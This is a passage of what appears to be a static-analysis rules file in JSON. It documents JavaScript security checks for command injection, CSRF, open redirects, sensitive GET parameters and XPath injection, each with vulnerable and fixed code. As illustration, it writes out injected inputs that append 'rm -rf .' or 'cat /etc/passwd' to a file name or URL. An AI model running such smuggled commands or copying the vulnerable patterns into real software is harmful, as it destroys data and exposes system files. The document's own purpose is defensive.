concatenated string. This is both safer and more portable.\n\nIf given arguments as a single string, avoid simply splitting the string on whitespace. Arguments may contain quoted whitespace, causing them to split into multiple arguments. Use a library like `shell-quote` to parse the string into an array of arguments instead.\n\nIf this approach is not viable, then add code to verify that the user input string is safe before using it.\n\n\n## Example\nThe following example shows code that extracts a filename from an HTTP query parameter that may contain untrusted data, and then embeds it into a shell command to count its lines without examining it first:\n\n\n```javascript\nvar cp = require(\"child_process\"),\n http = require('http'),\n url = require('url');\n\nvar server = http.createServer(function(req, res) {\n let file = url.parse(req.url, true).query.path;\n\n cp.execSync(`wc -l ${file}`); // BAD\n});\n\n```\nA malicious user can take advantage of this code by executing arbitrary shell commands. For example, by providing a filename like `foo.txt; rm -rf .`, the user can first count the lines in `foo.txt` and subsequently delete all files in the current directory.\n\nTo avoid this catastrophic behavior, use an API such as `child_process.execFileSync` that does not spawn a shell by default:\n\n\n```javascript\nvar cp = require(\"child_process\"),\n http = require('http'),\n url = require('url');\n\nvar server = http.createServer(function(req, res) {\n let file = url.parse(req.url, true).query.path;\n\n cp.execFileSync('wc', ['-l', file]); // GOOD\n});\n\n```\nIf you want to allow the user to specify other options to `wc`, you can use a library like `shell-quote` to parse the user input into an array of arguments without risking command injection:\n\n\n```javascript\nvar cp = require(\"child_process\"),\n http = require('http'),\n url = require('url'),\n shellQuote = require('shell-quote');\n\nvar server = http.createServer(function(req, res) {\n let options = url.parse(req.url, true).query.options;\n\n cp.execFileSync('wc', shellQuote.parse(options)); // GOOD\n});\n\n```\nAlternatively, the original example can be made safe by checking the filename against an allowlist of safe characters before using it:\n\n\n```javascript\nvar cp = require(\"child_process\"),\n http = require('http'),\n url = require('url');\n\nvar server = http.createServer(function(req, res) {\n let file = url.parse(req.url, true).query.path;\n\n // only allow safe characters in file name\n if (file.match(/^[\\w\\.\\-\\/]+$/)) {\n cp.execSync(`wc -l ${file}`); // GOOD\n }\n});\n\n```\n\n## References\n* OWASP: [Command Injection](https://www.owasp.org/index.php/Command_Injection).\n* npm: [shell-quote](https://www.npmjs.com/package/shell-quote).\n* Common Weakness Enumeration: [CWE-78](https://cwe.mitre.org/data/definitions/78.html).\n* Common Weakness Enumeration: [CWE-88](https://cwe.mitre.org/data/definitions/88.html).\n" + }, + "properties" : { + "tags" : [ "correctness", "security", "external/cwe/cwe-078", "external/cwe/cwe-088" ], + "description" : "Using externally controlled strings in a command line may allow a malicious\n user to change the meaning of the command.", + "id" : "js/command-line-injection", + "kind" : "path-problem", + "name" : "Uncontrolled command line", + "precision" : "high", + "problem.severity" : "error", + "security-severity" : "9.8" + } + }, { + "id" : "js/unnecessary-use-of-cat", + "name" : "js/unnecessary-use-of-cat", + "shortDescription" : { + "text" : "Unnecessary use of `cat` process" + }, + "fullDescription" : { + "text" : "Using the `cat` process to read a file is unnecessarily complex, inefficient, unportable, and can lead to subtle bugs, or even security vulnerabilities." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "error" + }, + "help" : { + "text" : "# Unnecessary use of `cat` process\nUsing the unix command `cat` only to read a file is an unnecessarily complex way to achieve something that can be done in a simpler and safer manner using the Node.js `fs.readFile` API.\n\nThe use of `cat` for simple file reads leads to code that is unportable, inefficient, complex, and can lead to subtle bugs or even security vulnerabilities.\n\n\n## Recommendation\nUse `fs.readFile` or `fs.readFileSync` to read files from the file system.\n\n\n## Example\nThe following example shows code that reads a file using `cat`:\n\n\n```javascript\nvar child_process = require('child_process');\n\nmodule.exports = function (name) {\n return child_process.execSync(\"cat \" + name).toString();\n};\n\n```\nThe code in the example will break if the input `name` contains special characters (including space). Additionally, it does not work on Windows and if the input is user-controlled, a command injection attack can happen.\n\nThe `fs.readFile` API should be used to avoid these potential issues:\n\n\n```javascript\nvar fs = require('fs');\n\nmodule.exports = function (name) {\n return fs.readFileSync(name).toString();\n};\n\n```\n\n## References\n* OWASP: [Command Injection](https://www.owasp.org/index.php/Command_Injection).\n* Node.js: [File System API](https://nodejs.org/api/fs.html).\n* [The Useless Use of Cat Award](http://porkmail.org/era/unix/award.html#cat).\n* Common Weakness Enumeration: [CWE-78](https://cwe.mitre.org/data/definitions/78.html).\n", + "markdown" : "# Unnecessary use of `cat` process\nUsing the unix command `cat` only to read a file is an unnecessarily complex way to achieve something that can be done in a simpler and safer manner using the Node.js `fs.readFile` API.\n\nThe use of `cat` for simple file reads leads to code that is unportable, inefficient, complex, and can lead to subtle bugs or even security vulnerabilities.\n\n\n## Recommendation\nUse `fs.readFile` or `fs.readFileSync` to read files from the file system.\n\n\n## Example\nThe following example shows code that reads a file using `cat`:\n\n\n```javascript\nvar child_process = require('child_process');\n\nmodule.exports = function (name) {\n return child_process.execSync(\"cat \" + name).toString();\n};\n\n```\nThe code in the example will break if the input `name` contains special characters (including space). Additionally, it does not work on Windows and if the input is user-controlled, a command injection attack can happen.\n\nThe `fs.readFile` API should be used to avoid these potential issues:\n\n\n```javascript\nvar fs = require('fs');\n\nmodule.exports = function (name) {\n return fs.readFileSync(name).toString();\n};\n\n```\n\n## References\n* OWASP: [Command Injection](https://www.owasp.org/index.php/Command_Injection).\n* Node.js: [File System API](https://nodejs.org/api/fs.html).\n* [The Useless Use of Cat Award](http://porkmail.org/era/unix/award.html#cat).\n* Common Weakness Enumeration: [CWE-78](https://cwe.mitre.org/data/definitions/78.html).\n" + }, + "properties" : { + "tags" : [ "correctness", "security", "maintainability", "external/cwe/cwe-078" ], + "description" : "Using the `cat` process to read a file is unnecessarily complex, inefficient, unportable, and can lead to subtle bugs, or even security vulnerabilities.", + "id" : "js/unnecessary-use-of-cat", + "kind" : "problem", + "name" : "Unnecessary use of `cat` process", + "precision" : "high", + "problem.severity" : "error", + "security-severity" : "6.3" + } + }, { + "id" : "js/shell-command-constructed-from-input", + "name" : "js/shell-command-constructed-from-input", + "shortDescription" : { + "text" : "Unsafe shell command constructed from library input" + }, + "fullDescription" : { + "text" : "Using externally controlled strings in a command line may allow a malicious user to change the meaning of the command." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "error" + }, + "help" : { + "text" : "# Unsafe shell command constructed from library input\nDynamically constructing a shell command with inputs from exported functions may inadvertently change the meaning of the shell command. Clients using the exported function may use inputs containing characters that the shell interprets in a special way, for instance quotes and spaces. This can result in the shell command misbehaving, or even allowing a malicious user to execute arbitrary commands on the system.\n\n\n## Recommendation\nIf possible, provide the dynamic arguments to the shell as an array using a safe API such as `child_process.execFile` to avoid interpretation by the shell.\n\nIf given arguments as a single string, avoid simply splitting the string on whitespace. Arguments may contain quoted whitespace, causing them to split into multiple arguments. Use a library like `shell-quote` to parse the string into an array of arguments instead.\n\nAlternatively, if the command must be interpreted by a shell (for example because it includes I/O redirections), you can use `shell-quote` to escape any special characters in the input before embedding it in the command.\n\n\n## Example\nThe following example shows a dynamically constructed shell command that downloads a file from a remote URL.\n\n\n```javascript\nvar cp = require(\"child_process\");\n\nmodule.exports = function download(path, callback) {\n cp.exec(\"wget \" + path, callback);\n}\n\n```\nThe shell command will, however, fail to work as intended if the input contains spaces or other special characters interpreted in a special way by the shell.\n\nEven worse, a client might pass in user-controlled data, not knowing that the input is interpreted as a shell command. This could allow a malicious user to provide the input `http://example.org; cat /etc/passwd` in order to execute the command `cat /etc/passwd`.\n\nTo avoid such potentially catastrophic behaviors, provide the inputs from exported functions as an argument that does not get interpreted by a shell:\n\n\n```javascript\nvar cp = require(\"child_process\");\n\nmodule.exports = function download(path, callback) {\n cp.execFile(\"wget\", [path], callback);\n}\n\n```\nAs another example, consider the following code which is similar to the preceding example, but pipes the output of `wget` into `wc -l` to count the number of lines in the downloaded file.\n\n\n```javascript\nvar cp = require(\"child_process\");\n\nmodule.exports = function download(path, callback) {\n cp.exec(\"wget \" + path + \" | wc -l\", callback);\n};\n\n```\nIn this case, using `child_process.execFile` is not an option because the shell is needed to interpret the pipe operator. Instead, you can use `shell-quote` to escape the input before embedding it in the command:\n\n\n```javascript\nvar cp = require(\"child_process\");\n\nmodule.exports = function download(path, callback) {\n cp.exec(\"wget \" + shellQuote.quote([path]) + \" | wc -l\", callback);\n};\n\n```\n\n## References\n* OWASP: [Command Injection](https://www.owasp.org/index.php/Command_Injection).\n* npm: [shell-quote](https://www.npmjs.com/package/shell-quote).\n* Common Weakness Enumeration: [CWE-78](https://cwe.mitre.org/data/definitions/78.html).\n* Common Weakness Enumeration: [CWE-88](https://cwe.mitre.org/data/definitions/88.html).\n", + "markdown" : "# Unsafe shell command constructed from library input\nDynamically constructing a shell command with inputs from exported functions may inadvertently change the meaning of the shell command. Clients using the exported function may use inputs containing characters that the shell interprets in a special way, for instance quotes and spaces. This can result in the shell command misbehaving, or even allowing a malicious user to execute arbitrary commands on the system.\n\n\n## Recommendation\nIf possible, provide the dynamic arguments to the shell as an array using a safe API such as `child_process.execFile` to avoid interpretation by the shell.\n\nIf given arguments as a single string, avoid simply splitting the string on whitespace. Arguments may contain quoted whitespace, causing them to split into multiple arguments. Use a library like `shell-quote` to parse the string into an array of arguments instead.\n\nAlternatively, if the command must be interpreted by a shell (for example because it includes I/O redirections), you can use `shell-quote` to escape any special characters in the input before embedding it in the command.\n\n\n## Example\nThe following example shows a dynamically constructed shell command that downloads a file from a remote URL.\n\n\n```javascript\nvar cp = require(\"child_process\");\n\nmodule.exports = function download(path, callback) {\n cp.exec(\"wget \" + path, callback);\n}\n\n```\nThe shell command will, however, fail to work as intended if the input contains spaces or other special characters interpreted in a special way by the shell.\n\nEven worse, a client might pass in user-controlled data, not knowing that the input is interpreted as a shell command. This could allow a malicious user to provide the input `http://example.org; cat /etc/passwd` in order to execute the command `cat /etc/passwd`.\n\nTo avoid such potentially catastrophic behaviors, provide the inputs from exported functions as an argument that does not get interpreted by a shell:\n\n\n```javascript\nvar cp = require(\"child_process\");\n\nmodule.exports = function download(path, callback) {\n cp.execFile(\"wget\", [path], callback);\n}\n\n```\nAs another example, consider the following code which is similar to the preceding example, but pipes the output of `wget` into `wc -l` to count the number of lines in the downloaded file.\n\n\n```javascript\nvar cp = require(\"child_process\");\n\nmodule.exports = function download(path, callback) {\n cp.exec(\"wget \" + path + \" | wc -l\", callback);\n};\n\n```\nIn this case, using `child_process.execFile` is not an option because the shell is needed to interpret the pipe operator. Instead, you can use `shell-quote` to escape the input before embedding it in the command:\n\n\n```javascript\nvar cp = require(\"child_process\");\n\nmodule.exports = function download(path, callback) {\n cp.exec(\"wget \" + shellQuote.quote([path]) + \" | wc -l\", callback);\n};\n\n```\n\n## References\n* OWASP: [Command Injection](https://www.owasp.org/index.php/Command_Injection).\n* npm: [shell-quote](https://www.npmjs.com/package/shell-quote).\n* Common Weakness Enumeration: [CWE-78](https://cwe.mitre.org/data/definitions/78.html).\n* Common Weakness Enumeration: [CWE-88](https://cwe.mitre.org/data/definitions/88.html).\n" + }, + "properties" : { + "tags" : [ "correctness", "security", "external/cwe/cwe-078", "external/cwe/cwe-088" ], + "description" : "Using externally controlled strings in a command line may allow a malicious\n user to change the meaning of the command.", + "id" : "js/shell-command-constructed-from-input", + "kind" : "path-problem", + "name" : "Unsafe shell command constructed from library input", + "precision" : "high", + "problem.severity" : "error", + "security-severity" : "6.3" + } + }, { + "id" : "js/sensitive-get-query", + "name" : "js/sensitive-get-query", + "shortDescription" : { + "text" : "Sensitive data read from GET request" + }, + "fullDescription" : { + "text" : "Placing sensitive data in a GET request increases the risk of the data being exposed to an attacker." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "warning" + }, + "help" : { + "text" : "# Sensitive data read from GET request\nSensitive information such as user passwords should not be transmitted within the query string of the requested URL. Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing sensitive information into the URL therefore increases the risk that it will be captured by an attacker.\n\n\n## Recommendation\nUse HTTP POST to send sensitive information as part of the request body; for example, as form data.\n\n\n## Example\nThe following example shows two route handlers that both receive a username and a password. The first receives this sensitive information from the query parameters of a GET request, which is transmitted in the URL. The second receives this sensitive information from the request body of a POST request.\n\n\n```javascript\nconst express = require('express');\nconst app = express();\napp.use(require('body-parser').urlencoded({ extended: false }))\n\n// bad: sensitive information is read from query parameters\napp.get('/login1', (req, res) => {\n const user = req.query.user;\n const password = req.query.password;\n if (checkUser(user, password)) {\n res.send('Welcome');\n } else {\n res.send('Access denied');\n }\n});\n\n// good: sensitive information is read from post body\napp.post('/login2', (req, res) => {\n const user = req.body.user;\n const password = req.body.password;\n if (checkUser(user, password)) {\n res.send('Welcome');\n } else {\n res.send('Access denied');\n }\n});\n\n```\n\n## References\n* CWE: [CWE-598: Use of GET Request Method with Sensitive Query Strings](https://cwe.mitre.org/data/definitions/598.html)\n* PortSwigger (Burp): [Password Submitted using GET Method](https://portswigger.net/kb/issues/00400300_password-submitted-using-get-method)\n* OWASP: [Information Exposure through Query Strings in URL](https://owasp.org/www-community/vulnerabilities/Information_exposure_through_query_strings_in_url)\n* Common Weakness Enumeration: [CWE-598](https://cwe.mitre.org/data/definitions/598.html).\n", + "markdown" : "# Sensitive data read from GET request\nSensitive information such as user passwords should not be transmitted within the query string of the requested URL. Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing sensitive information into the URL therefore increases the risk that it will be captured by an attacker.\n\n\n## Recommendation\nUse HTTP POST to send sensitive information as part of the request body; for example, as form data.\n\n\n## Example\nThe following example shows two route handlers that both receive a username and a password. The first receives this sensitive information from the query parameters of a GET request, which is transmitted in the URL. The second receives this sensitive information from the request body of a POST request.\n\n\n```javascript\nconst express = require('express');\nconst app = express();\napp.use(require('body-parser').urlencoded({ extended: false }))\n\n// bad: sensitive information is read from query parameters\napp.get('/login1', (req, res) => {\n const user = req.query.user;\n const password = req.query.password;\n if (checkUser(user, password)) {\n res.send('Welcome');\n } else {\n res.send('Access denied');\n }\n});\n\n// good: sensitive information is read from post body\napp.post('/login2', (req, res) => {\n const user = req.body.user;\n const password = req.body.password;\n if (checkUser(user, password)) {\n res.send('Welcome');\n } else {\n res.send('Access denied');\n }\n});\n\n```\n\n## References\n* CWE: [CWE-598: Use of GET Request Method with Sensitive Query Strings](https://cwe.mitre.org/data/definitions/598.html)\n* PortSwigger (Burp): [Password Submitted using GET Method](https://portswigger.net/kb/issues/00400300_password-submitted-using-get-method)\n* OWASP: [Information Exposure through Query Strings in URL](https://owasp.org/www-community/vulnerabilities/Information_exposure_through_query_strings_in_url)\n* Common Weakness Enumeration: [CWE-598](https://cwe.mitre.org/data/definitions/598.html).\n" + }, + "properties" : { + "tags" : [ "security", "external/cwe/cwe-598" ], + "description" : "Placing sensitive data in a GET request increases the risk of\n the data being exposed to an attacker.", + "id" : "js/sensitive-get-query", + "kind" : "problem", + "name" : "Sensitive data read from GET request", + "precision" : "high", + "problem.severity" : "warning", + "security-severity" : "6.5" + } + }, { + "id" : "js/missing-token-validation", + "name" : "js/missing-token-validation", + "shortDescription" : { + "text" : "Missing CSRF middleware" + }, + "fullDescription" : { + "text" : "Using cookies without CSRF protection may allow malicious websites to submit requests on behalf of the user." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "error" + }, + "help" : { + "text" : "# Missing CSRF middleware\nWebsites that rely on cookie-based authentication may be vulnerable to cross-site request forgery (CSRF). Specifically, a state-changing request should include a secret token so the request can't be forged by an attacker. Otherwise, unwanted requests can be submitted on behalf of a user who visits a malicious website.\n\nThis is typically mitigated by embedding a session-specific secret token in each request. This token is then checked as an additional authentication measure. A malicious website should have no way of guessing the correct token to embed in the request.\n\n\n## Recommendation\nUse a middleware package such as `lusca.csrf` to protect against CSRF attacks.\n\n\n## Example\nIn the example below, the server authenticates users before performing the `changeEmail` POST action:\n\n\n```javascript\nconst app = require(\"express\")(),\n cookieParser = require(\"cookie-parser\"),\n bodyParser = require(\"body-parser\"),\n session = require(\"express-session\");\n\napp.use(cookieParser());\napp.use(bodyParser.urlencoded({ extended: false }));\napp.use(session({ secret: process.env['SECRET'], cookie: { maxAge: 60000 } }));\n\n// ...\n\napp.post(\"/changeEmail\", function(req, res) {\n const userId = req.session.id;\n const email = req.body[\"email\"];\n // ... update email associated with userId\n});\n\n```\nThis is not secure. An attacker can submit a POST `changeEmail` request on behalf of a user who visited a malicious website. Since authentication happens without any action from the user, the `changeEmail` action would be executed, despite not being initiated by the user.\n\nThis vulnerability can be mitigated by installing a CSRF protecting middleware handler:\n\n\n```javascript\nconst app = require(\"express\")(),\n cookieParser = require(\"cookie-parser\"),\n bodyParser = require(\"body-parser\"),\n session = require(\"express-session\"),\n csrf = require('lusca').csrf;\n\napp.use(cookieParser());\napp.use(bodyParser.urlencoded({ extended: false }));\napp.use(session({ secret: process.env['SECRET'], cookie: { maxAge: 60000 } }));\napp.use(csrf());\n\n// ...\n\napp.post(\"/changeEmail\", function(req, res) {\n const userId = req.session.id;\n const email = req.body[\"email\"];\n // ... update email associated with userId\n});\n\n```\n\n## References\n* OWASP: [Cross-Site Request Forgery (CSRF)](https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF))\n* NPM: [lusca](https://www.npmjs.com/package/lusca)\n* Common Weakness Enumeration: [CWE-352](https://cwe.mitre.org/data/definitions/352.html).\n", + "markdown" : "# Missing CSRF middleware\nWebsites that rely on cookie-based authentication may be vulnerable to cross-site request forgery (CSRF). Specifically, a state-changing request should include a secret token so the request can't be forged by an attacker. Otherwise, unwanted requests can be submitted on behalf of a user who visits a malicious website.\n\nThis is typically mitigated by embedding a session-specific secret token in each request. This token is then checked as an additional authentication measure. A malicious website should have no way of guessing the correct token to embed in the request.\n\n\n## Recommendation\nUse a middleware package such as `lusca.csrf` to protect against CSRF attacks.\n\n\n## Example\nIn the example below, the server authenticates users before performing the `changeEmail` POST action:\n\n\n```javascript\nconst app = require(\"express\")(),\n cookieParser = require(\"cookie-parser\"),\n bodyParser = require(\"body-parser\"),\n session = require(\"express-session\");\n\napp.use(cookieParser());\napp.use(bodyParser.urlencoded({ extended: false }));\napp.use(session({ secret: process.env['SECRET'], cookie: { maxAge: 60000 } }));\n\n// ...\n\napp.post(\"/changeEmail\", function(req, res) {\n const userId = req.session.id;\n const email = req.body[\"email\"];\n // ... update email associated with userId\n});\n\n```\nThis is not secure. An attacker can submit a POST `changeEmail` request on behalf of a user who visited a malicious website. Since authentication happens without any action from the user, the `changeEmail` action would be executed, despite not being initiated by the user.\n\nThis vulnerability can be mitigated by installing a CSRF protecting middleware handler:\n\n\n```javascript\nconst app = require(\"express\")(),\n cookieParser = require(\"cookie-parser\"),\n bodyParser = require(\"body-parser\"),\n session = require(\"express-session\"),\n csrf = require('lusca').csrf;\n\napp.use(cookieParser());\napp.use(bodyParser.urlencoded({ extended: false }));\napp.use(session({ secret: process.env['SECRET'], cookie: { maxAge: 60000 } }));\napp.use(csrf());\n\n// ...\n\napp.post(\"/changeEmail\", function(req, res) {\n const userId = req.session.id;\n const email = req.body[\"email\"];\n // ... update email associated with userId\n});\n\n```\n\n## References\n* OWASP: [Cross-Site Request Forgery (CSRF)](https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF))\n* NPM: [lusca](https://www.npmjs.com/package/lusca)\n* Common Weakness Enumeration: [CWE-352](https://cwe.mitre.org/data/definitions/352.html).\n" + }, + "properties" : { + "tags" : [ "security", "external/cwe/cwe-352" ], + "description" : "Using cookies without CSRF protection may allow malicious websites to\n submit requests on behalf of the user.", + "id" : "js/missing-token-validation", + "kind" : "problem", + "name" : "Missing CSRF middleware", + "precision" : "high", + "problem.severity" : "error", + "security-severity" : "8.8" + } + }, { + "id" : "js/server-side-unvalidated-url-redirection", + "name" : "js/server-side-unvalidated-url-redirection", + "shortDescription" : { + "text" : "Server-side URL redirect" + }, + "fullDescription" : { + "text" : "Server-side URL redirection based on unvalidated user input may cause redirection to malicious web sites." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "warning" + }, + "help" : { + "text" : "# Server-side URL redirect\nDirectly incorporating user input into a URL redirect request without validating the input can facilitate phishing attacks. In these attacks, unsuspecting users can be redirected to a malicious site that looks very similar to the real site they intend to visit, but which is controlled by the attacker.\n\n\n## Recommendation\nTo guard against untrusted URL redirection, it is advisable to avoid putting user input directly into a redirect URL. Instead, maintain a list of authorized redirects on the server; then choose from that list based on the user input provided.\n\nIf this is not possible, then the user input should be validated in some other way, for example, by verifying that the target URL is on the same host as the current page.\n\n\n## Example\nThe following example shows an HTTP request parameter being used directly in a URL redirect without validating the input, which facilitates phishing attacks:\n\n\n```javascript\nconst app = require(\"express\")();\n\napp.get(\"/redirect\", function (req, res) {\n // BAD: a request parameter is incorporated without validation into a URL redirect\n res.redirect(req.query[\"target\"]);\n});\n\n```\nOne way to remedy the problem is to validate the user input against a known fixed string before doing the redirection:\n\n\n```javascript\nconst app = require(\"express\")();\n\nconst VALID_REDIRECT = \"http://cwe.mitre.org/data/definitions/601.html\";\n\napp.get(\"/redirect\", function (req, res) {\n // GOOD: the request parameter is validated against a known fixed string\n let target = req.query[\"target\"];\n if (VALID_REDIRECT === target) {\n res.redirect(target);\n } else {\n res.redirect(\"/\");\n }\n});\n\n```\nAlternatively, we can check that the target URL does not redirect to a different host by parsing it relative to a base URL with a known host and verifying that the host stays the same:\n\n\n```javascript\nconst app = require(\"express\")();\n\nfunction isLocalUrl(path) {\n try {\n return (\n // TODO: consider substituting your own domain for example.com\n new URL(path, \"https://example.com\").origin === \"https://example.com\"\n );\n } catch (e) {\n return false;\n }\n}\n\napp.get(\"/redirect\", function (req, res) {\n // GOOD: check that we don't redirect to a different host\n let target = req.query[\"target\"];\n if (isLocalUrl(target)) {\n res.redirect(target);\n } else {\n res.redirect(\"/\");\n }\n});\n\n```\nNote that as written, the above code will allow redirects to URLs on `example.com`, which is harmless but perhaps not intended. You can substitute your own domain (if known) for `example.com` to prevent this.\n\n\n## References\n* OWASP: [ XSS Unvalidated Redirects and Forwards Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Unvalidated_Redirects_and_Forwards_Cheat_Sheet.html).\n* Common Weakness Enumeration: [CWE-601](https://cwe.mitre.org/data/definitions/601.html).\n", + "markdown" : "# Server-side URL redirect\nDirectly incorporating user input into a URL redirect request without validating the input can facilitate phishing attacks. In these attacks, unsuspecting users can be redirected to a malicious site that looks very similar to the real site they intend to visit, but which is controlled by the attacker.\n\n\n## Recommendation\nTo guard against untrusted URL redirection, it is advisable to avoid putting user input directly into a redirect URL. Instead, maintain a list of authorized redirects on the server; then choose from that list based on the user input provided.\n\nIf this is not possible, then the user input should be validated in some other way, for example, by verifying that the target URL is on the same host as the current page.\n\n\n## Example\nThe following example shows an HTTP request parameter being used directly in a URL redirect without validating the input, which facilitates phishing attacks:\n\n\n```javascript\nconst app = require(\"express\")();\n\napp.get(\"/redirect\", function (req, res) {\n // BAD: a request parameter is incorporated without validation into a URL redirect\n res.redirect(req.query[\"target\"]);\n});\n\n```\nOne way to remedy the problem is to validate the user input against a known fixed string before doing the redirection:\n\n\n```javascript\nconst app = require(\"express\")();\n\nconst VALID_REDIRECT = \"http://cwe.mitre.org/data/definitions/601.html\";\n\napp.get(\"/redirect\", function (req, res) {\n // GOOD: the request parameter is validated against a known fixed string\n let target = req.query[\"target\"];\n if (VALID_REDIRECT === target) {\n res.redirect(target);\n } else {\n res.redirect(\"/\");\n }\n});\n\n```\nAlternatively, we can check that the target URL does not redirect to a different host by parsing it relative to a base URL with a known host and verifying that the host stays the same:\n\n\n```javascript\nconst app = require(\"express\")();\n\nfunction isLocalUrl(path) {\n try {\n return (\n // TODO: consider substituting your own domain for example.com\n new URL(path, \"https://example.com\").origin === \"https://example.com\"\n );\n } catch (e) {\n return false;\n }\n}\n\napp.get(\"/redirect\", function (req, res) {\n // GOOD: check that we don't redirect to a different host\n let target = req.query[\"target\"];\n if (isLocalUrl(target)) {\n res.redirect(target);\n } else {\n res.redirect(\"/\");\n }\n});\n\n```\nNote that as written, the above code will allow redirects to URLs on `example.com`, which is harmless but perhaps not intended. You can substitute your own domain (if known) for `example.com` to prevent this.\n\n\n## References\n* OWASP: [ XSS Unvalidated Redirects and Forwards Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Unvalidated_Redirects_and_Forwards_Cheat_Sheet.html).\n* Common Weakness Enumeration: [CWE-601](https://cwe.mitre.org/data/definitions/601.html).\n" + }, + "properties" : { + "tags" : [ "security", "external/cwe/cwe-601" ], + "description" : "Server-side URL redirection based on unvalidated user input\n may cause redirection to malicious web sites.", + "id" : "js/server-side-unvalidated-url-redirection", + "kind" : "path-problem", + "name" : "Server-side URL redirect", + "precision" : "high", + "problem.severity" : "warning", + "security-severity" : "6.1" + } + }, { + "id" : "js/client-side-unvalidated-url-redirection", + "name" : "js/client-side-unvalidated-url-redirection", + "shortDescription" : { + "text" : "Client-side URL redirect" + }, + "fullDescription" : { + "text" : "Client-side URL redirection based on unvalidated user input may cause redirection to malicious web sites." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "error" + }, + "help" : { + "text" : "# Client-side URL redirect\nRedirecting to a URL that is constructed from parts of the DOM that may be controlled by an attacker can facilitate phishing attacks. In these attacks, unsuspecting users can be redirected to a malicious site that looks very similar to the real site they intend to visit, but which is controlled by the attacker.\n\n\n## Recommendation\nTo guard against untrusted URL redirection, it is advisable to avoid putting user input directly into a redirect URL. Instead, maintain a list of authorized redirects on the server; then choose from that list based on the user input provided.\n\n\n## Example\nThe following example uses a regular expression to extract a query parameter from the document URL, and then uses it to construct a new URL to redirect to without any further validation. This may allow an attacker to craft a link that redirects from a trusted website to some arbitrary website of their choosing, which facilitates phishing attacks:\n\n\n```javascript\nwindow.location = /.*redirect=([^&]*).*/.exec(document.location.href)[1];\n\n```\n\n## References\n* OWASP: [ XSS Unvalidated Redirects and Forwards Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Unvalidated_Redirects_and_Forwards_Cheat_Sheet.html).\n* Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n* Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n* Common Weakness Enumeration: [CWE-601](https://cwe.mitre.org/data/definitions/601.html).\n", + "markdown" : "# Client-side URL redirect\nRedirecting to a URL that is constructed from parts of the DOM that may be controlled by an attacker can facilitate phishing attacks. In these attacks, unsuspecting users can be redirected to a malicious site that looks very similar to the real site they intend to visit, but which is controlled by the attacker.\n\n\n## Recommendation\nTo guard against untrusted URL redirection, it is advisable to avoid putting user input directly into a redirect URL. Instead, maintain a list of authorized redirects on the server; then choose from that list based on the user input provided.\n\n\n## Example\nThe following example uses a regular expression to extract a query parameter from the document URL, and then uses it to construct a new URL to redirect to without any further validation. This may allow an attacker to craft a link that redirects from a trusted website to some arbitrary website of their choosing, which facilitates phishing attacks:\n\n\n```javascript\nwindow.location = /.*redirect=([^&]*).*/.exec(document.location.href)[1];\n\n```\n\n## References\n* OWASP: [ XSS Unvalidated Redirects and Forwards Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Unvalidated_Redirects_and_Forwards_Cheat_Sheet.html).\n* Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n* Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n* Common Weakness Enumeration: [CWE-601](https://cwe.mitre.org/data/definitions/601.html).\n" + }, + "properties" : { + "tags" : [ "security", "external/cwe/cwe-079", "external/cwe/cwe-116", "external/cwe/cwe-601" ], + "description" : "Client-side URL redirection based on unvalidated user input\n may cause redirection to malicious web sites.", + "id" : "js/client-side-unvalidated-url-redirection", + "kind" : "path-problem", + "name" : "Client-side URL redirect", + "precision" : "high", + "problem.severity" : "error", + "security-severity" : "6.1" + } + }, { + "id" : "js/xpath-injection", + "name" : "js/xpath-injection", + "shortDescription" : { + "text" : "XPath injection" + }, + "fullDescription" : { + "text" : "Building an XPath expression from user-controlled sources is vulnerable to insertion of malicious code by the user." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "error" + }, + "help" : { + "text" : "# XPath injection\nIf an XPath expression is built using string concatenation, and the components of the concatenation include user input, it makes it very easy for a user to create a malicious XPath expression.\n\n\n## Recommendation\nIf user input must be included in an XPath expression, either sanitize the data or use variable references to safely embed it without altering the structure of the expression.\n\n\n## Example\nIn this example, the code accepts a user name specified by the user, and uses this unvalidated and unsanitized value in an XPath expression constructed using the `xpath` package. This is vulnerable to the user providing special characters or string sequences that change the meaning of the XPath expression to search for different values.\n\n\n```javascript\nconst express = require('express');\nconst xpath = require('xpath');\nconst app = express();\n\napp.get('/some/route', function(req, res) {\n let userName = req.param(\"userName\");\n\n // BAD: Use user-provided data directly in an XPath expression\n let badXPathExpr = xpath.parse(\"//users/user[login/text()='\" + userName + \"']/home_dir/text()\");\n badXPathExpr.select({\n node: root\n });\n});\n\n```\nInstead, embed the user input using the variable replacement mechanism offered by `xpath`:\n\n\n```javascript\nconst express = require('express');\nconst xpath = require('xpath');\nconst app = express();\n\napp.get('/some/route', function(req, res) {\n let userName = req.param(\"userName\");\n\n // GOOD: Embed user-provided data using variables\n let goodXPathExpr = xpath.parse(\"//users/user[login/text()=$userName]/home_dir/text()\");\n goodXPathExpr.select({\n node: root,\n variables: { userName: userName }\n });\n});\n\n```\n\n## References\n* OWASP: [Testing for XPath Injection](https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/09-Testing_for_XPath_Injection).\n* OWASP: [XPath Injection](https://www.owasp.org/index.php/XPATH_Injection).\n* npm: 